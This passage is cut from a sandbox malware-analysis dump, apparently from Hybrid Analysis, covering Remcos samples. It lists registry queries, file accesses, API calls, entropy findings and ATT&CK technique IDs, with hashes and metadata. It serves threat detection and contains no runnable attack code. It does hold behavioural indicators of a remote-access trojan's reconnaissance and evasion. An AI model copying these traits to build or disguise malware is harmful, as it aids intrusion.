\"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to touch file \"C:\\version.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to touch file \"C:\\329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe.Local\\\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to access non-existent file \"C:\\329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe.Local\\\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" trying to access non-existent file \"C:\\329F762304C5F05ABDEED08823E31F8904B265C6DF95702CA43EFAE8F6563520.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"329F762304C5F05ABDEED08823E31F8904B265C6DF95702CA43EFAE8F6563520\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\"; Key: \"PRODUCTNAME\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\RMC-H6V4FW\"; Key: \"DEL\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\RMC-H6V4FW\"; Key: \"TIME\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"FindResourceA\" with parameter \"4584108\" - (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"FindResourceW\" with parameter \"123\" - (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"FindResourceW\" with parameter \"3\" - (UID: 00000000-00002744)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4637016'}\" (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4637032'}\" (UID: 00000000-00002744)\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4636984'}\" (UID: 00000000-00002744)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"IsWow64Process\" with parameter \"2744\" - (UID: 00000000-00002744)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002744)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520\" has resource with unusual entropy \"RT_RCDATA:7.86472403531\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520\" has a section named \".gfids\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"SleepConditionVariableCS\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNEL32.DLL)\n Found string \"FlsAlloc\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)\n Found string \"FlsFree\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)\n Found string \"FlsGetValue\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)\n Found string \"FlsSetValue\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)\n Found string \"InitializeCriticalSectionEx\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)\n Found string \"InitOnceExecuteOnce\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNEL32.DLL)\n Found string \"CreateEventExW\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)\n Found string \"CreateSemaphoreW\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNEL32.DLL)\n Found string \"CreateSemaphoreExW\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)\n Found string \"CreateThreadpoolTimer\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)\n Found string \"CreateThreadpoolWait\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)\n Found string \"CreateSymbolicLinkW\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNEL32.DLL)\n Found string \"GetTickCount64\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)\n Found string \"GetFileInformationByHandleEx\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNEL32.DLL)\n Found string \"SetFileInformationByHandle\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)\n Found string \"SleepConditionVariableSRW\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNEL32.DLL)\n Found string \"CreateThreadpoolWork\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)\n Found string \"CompareStringEx\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)\n Found string \"GetLocaleInfoEx\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)\n Found string \"LCMapStringEx\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)\n Found string \"AreFileApisANSI\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)\n Found string \"EnumSystemLocalesEx\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)\n Found string \"GetUserDefaultLocaleName\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)\n Found string \"IsValidLocaleName\" (Source: 329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520, API is part of module: KERNELBASE.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520\" has section name .text with entropy \"6.59396037145\"\n \"329f762304c5f05abdeed08823e31f8904b265c6df95702ca43efae8f6563520\" has section name .reloc with entropy \"6.60722133118\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
a16e4186a3a69f7ec7544083d4c6bbb67eae8d0fe40662d398bb50f5d571372e
https://hybrid-analysis.com/sample/a16e4186a3a69f7ec7544083d4c6bbb67eae8d0fe40662d398bb50f5d571372e
Hybrid Analysis - Remcos
{"size": 74274, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "a16e4186a3a69f7ec7544083d4c6bbb67eae8d0fe40662d398bb50f5d571372e", "sha256": "a16e4186a3a69f7ec7544083d4c6bbb67eae8d0fe40662d398bb50f5d571372e", "av_detect": 44, "vx_family": "Win/grayware_confidence_70%", "threat_score": 35, "threat_level": 1, "verdict": "no verdict", "total_signatures": 7, "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 27051)", "99 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 27051)"], "imported_objects": ["25 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "26 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 26706)", "33 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)", "62 .OBJ Files (OMF) 